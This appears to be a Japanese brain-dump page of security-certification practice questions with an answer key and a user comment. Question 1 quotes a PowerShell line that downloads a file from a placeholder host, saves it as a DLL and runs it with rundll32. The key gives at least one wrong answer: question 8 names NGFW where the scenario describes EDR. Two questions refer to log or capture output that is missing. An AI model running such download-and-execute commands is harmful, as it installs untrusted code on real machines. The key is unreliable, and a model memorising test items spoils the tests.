An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:
C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll Which of the following BEST describes what the analyst found?
A. A Powershell code is performing a DLL injection.
B. A PowerShell code is changing Windows Update settings.
C. A PowerShell code is displaying a picture.
D. A PowerShell code is configuring environmental variables.
正解:A
解説: (Pass4Test メンバーにのみ表示されます)
質問 2:
A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?
A. WAF
B. SIEM
C. DLP
D. NIDS
正解:A
解説: (Pass4Test メンバーにのみ表示されます)
質問 3:
A store receives reports that shoppers' credit card information is being stolen. Upon further analysis, those same shoppers also withdrew money from an ATM in that store.
The attackers are using the targeted shoppers' credit card information to make online purchases. Which of the following attacks is the MOST probable cause?
A. Identity theft
B. RFID cloning
C. Shoulder surfing
D. Card skimming
正解:D
解説: (Pass4Test メンバーにのみ表示されます)
質問 4:
A security analyst is investigating network issues between a workstation and a company server. The workstation and server occasionally experience service disruptions, and employees are forced to reconnect to the server. In addition, some reports indicate sensitive information is being leaked from the server to the public.
The workstation IP address is 192.168.1.103, and the server IP address is 192.168.1.101.
The analyst runs arp -a On a separate workstation and obtains the following results:
Which of the following is most likely occurring?
A. On-path attack
B. MAC flooding attack
C. Evil twin attack
D. Domain hijacking attack
正解:A
解説: (Pass4Test メンバーにのみ表示されます)
質問 5:
A digital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?
A. SSD snapshot
B. Image volatile memory
C. Extract from checksums
D. pcap reassembly
正解:B
解説: (Pass4Test メンバーにのみ表示されます)
質問 6:
A web server log contains two million lines. A security analyst wants to obtain the next 500 lines starting from line 4,600. Which of the following commands will help the security analyst to achieve this objective?
A. cat webserver.log | tail -4600 | head -500 |
B. cat webserver.log | head -5100 | tail -500 |
C. cat webserver.log | tail -1995400 | tail -500 |
D. cat webserver.log | head -4600 | tail +500 |
正解:B
解説: (Pass4Test メンバーにのみ表示されます)
質問 7:
A user reports constant lag and performance issues with the wireless network when working at a local coffee shop A security analyst walks the user through an installation of Wireshark and gets a five-minute pcap to analyze. The analyst observes the following output:
Which of the following attacks does the analyst most likely see in this packet capture?
A. Evil twin
B. Bluejacking
C. ARP poisoning
D. Session replay
正解:A
解説: (Pass4Test メンバーにのみ表示されます)
質問 8:
A security engineer is concerned about using an agent on devices that relies completely on defined known-bad signatures. The security engineer wants to implement a tool with multiple components including the ability to track, analyze, and monitor devices without reliance on definitions alone. Which of the following solutions best fits this use case?
A. EDR
B. DLP
C. HIPS
D. NGFW
正解:D
Miura -
これだけでも良いとは思いますが、万全を期すのなら。
力作だと思いますので、使い込みたいと思います。